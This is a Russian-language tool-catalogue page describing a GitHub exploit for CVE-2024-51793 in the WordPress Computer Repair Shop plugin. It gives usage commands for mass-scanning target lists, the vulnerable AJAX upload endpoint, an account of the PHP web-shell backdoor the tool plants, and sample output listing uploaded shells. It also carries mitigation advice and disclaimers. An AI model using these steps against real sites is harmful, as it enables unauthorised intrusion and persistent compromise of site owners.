Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-51793 — Эксплуатирует CVE-2024-51793 — неаутентифицированную произвольную загрузку файлов в плагине WordPress Computer Repair Shop, сканирует списки целей, загружает PHP-веб-шеллы и сообщает об уязвимых сайтах. | Kitploit
Инструменты/GitHubGitHub/0axz-tools/cve-2024-51793
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHub0axz-tools/cve-2024-51793

CVE-2024-51793

Эксплуатирует CVE-2024-51793 — неаутентифицированную произвольную загрузку файлов в плагине WordPress Computer Repair Shop, сканирует списки целей, загружает PHP-веб-шеллы и сообщает об уязвимых сайтах.

Репозиторий
4910 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Документация инструмента эксплойта CVE-2024-51793

📋 Обзор CVE-2024-51793 — это уязвимость неаутентифицированной произвольной загрузки файлов в плагине Computer Repair Shop для WordPress (версии до 3.8116). Эта уязвимость позволяет злоумышленникам загружать произвольные файлы, включая PHP-веб-шеллы, без аутентификации, что приводит к удаленному выполнению кода на уязвимых сайтах WordPress.

🚨 Детали уязвимости CVE ID: CVE-2024-51793

Тип уязвимости: Неаутентифицированная произвольная загрузка файлов

Затронутый плагин: Computer Repair Shop WordPress Plugin

Затронутые версии: < 3.8116

Уровень риска: Критический (Оценка CVSS: 9.8)

🔧 Технические детали Уязвимость существует в обработчике действия wc_upload_file_ajax в плагине, который не выполняет должным образом проверку типов файлов и аутентификацию пользователей, позволяя неаутентифицированным злоумышленникам загружать вредоносные файлы непосредственно на сервер.

📦 Установка и требования Предварительные требования Python 3.6+

Необходимые пакеты: requests

Установка bash

Clone or download the script

git clone cd cve-2024-51793-exploit

Install required packages

pip install requests

Or if you have requirements.txt

pip install -r requirements.txt 🛠️ Руководство по использованию Базовое использование bash python3 cve_2024_51793_exploit.py -l targets.txt -t 50 Расширенное использование bash

With custom output directory

python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results

With verbose output (if implemented)

python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose Аргументы командной строки Argument Short Description Default --list -l Путь к файлу с целевыми URL (обязательно) - --threads -t Количество параллельных потоков 50 --output -o Директория для вывода результатов results Формат входного файла Создайте текстовый файл (targets.txt) с одним URL на строку:

text example.com https://vulnerable-site.com http://192.168.1.100/wordpress test-site.org/blog 🔍 Как это работает

  1. Проверка цели Скрипт сначала проверяет, работает ли на цели уязвимая версия плагина, проверяя:

text /wp-content/plugins/computer-repair-shop/readme.txt 2. Определение версии Он проверяет, что плагин содержит "CRM WordPress Plugin" и версия ниже 3.8116.

  1. Эксплуатация Если уязвим, скрипт загружает PHP-веб-шелл через:

text POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax 4. Полезная нагрузка веб-шелла Загруженный веб-шелл предоставляет:

  • Возможность загрузки файлов
  • Базовое управление файлами
  • Постоянный доступ через бэкдор

📊 Выходные файлы Инструмент создает два основных выходных файла:

vulnerable_targets.txt — список подтвержденных уязвимых URL

webshells.txt — список успешно загруженных URL веб-шеллов

🎯 Пример выполнения bash $ python3 cve_2024_51793_exploit.py -l targets.txt -t 30

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  CVE-2024-51793 Exploit Tool                                ║
║  Unauthenticated RCE in Computer Repair Shop WP Plugin      ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝

[ INFO ] Загружено 150 уникальных целей [ INFO ] Начинаем сканирование с 30 потоками

[ SCANNING ] Проверка: http://example.com/ [ VULNERABLE ] Цель определена: http://example.com/ [ SUCCESS ] Шелл загружен: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php

[ SCANNING ] Проверка: http://testsite.com/ [ NOT VULNERABLE ] Цель: http://testsite.com/

[ COMPLETED ] Сканирование успешно завершено 🛡️ Меры защиты Для владельцев сайтов Немедленные действия:

  • Обновите плагин Computer Repair Shop до версии 3.8116 или новее
  • Удалите любые загруженные вредоносные файлы
  • Проверьте на наличие существующих компрометаций

Профилактические меры:

  • Внедрите межсетевые экраны веб-приложений (WAF)
  • Регулярные аудиты безопасности
  • Мониторинг целостности файлов

Для исследователей безопасности

  • Используйте только в авторизованных средах
  • Следуйте практике ответственного раскрытия
  • Получите соответствующие разрешения перед тестированием

⚠️ Правовые и этические соображения

  • Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности
  • Несанкционированное использование против систем, которые вам не принадлежат, является незаконным
  • Всегда получайте соответствующее разрешение перед тестированием на проникновение
  • Следуйте практике ответственного раскрытия найденных уязвимостей

🔄 Обслуживание Обновления Регулярно проверяйте:

  • Обновления и улучшения скрипта
  • Изменения в статусе уязвимости
  • Новые методы обнаружения

Устранение неполадок Распространенные проблемы и решения:

  • Тайм-ауты соединения: увеличьте значения тайм-аута в конфигурации сессии
  • Ложноотрицательные результаты: убедитесь, что целевые URL доступны
  • Ограничение скорости: уменьшите количество потоков и добавьте задержки

📞 Поддержка По вопросам и улучшениям:

  • Создавайте задачи в репозитории проекта
  • Контакт: TG: @KtN_1990

📚 Ссылки

  • CVE-2024-51793 Official Entry
  • WordPress Plugin Directory
  • [Security Advisory References]

Отказ от ответственности: Этот инструмент должен использоваться только для законных исследований безопасности и авторизованного тестирования на проникновение. Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.

Скачать инструмент